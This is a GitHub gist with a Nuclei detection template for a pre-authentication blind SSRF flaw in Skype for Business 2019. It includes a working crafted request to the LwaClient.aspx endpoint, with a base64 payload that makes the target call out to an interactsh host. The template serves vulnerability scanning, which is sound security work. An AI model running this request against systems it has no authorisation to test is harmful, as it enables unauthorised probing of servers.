Skip to content

Instantly share code, notes, and snippets.

@hateshape
Created July 16, 2023 17:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hateshape/3760da7b59fb66ef850b758cf65191a5 to your computer and use it in GitHub Desktop.
Save hateshape/3760da7b59fb66ef850b758cf65191a5 to your computer and use it in GitHub Desktop.
skype-blind-ssrf - frycos
id: skype-blind-ssrf
info:
name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
author: hateshape
severity: high
description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
reference:
- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
metadata:
verified: true
tags: skype,blind-ssrf
variables:
ssrfpayload: "https://{{interactsh-url}}/?id=POC%25{1337*1337}#.xx//"
requests:
- raw:
- |
GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
name: match-dns
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
name: match-http
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment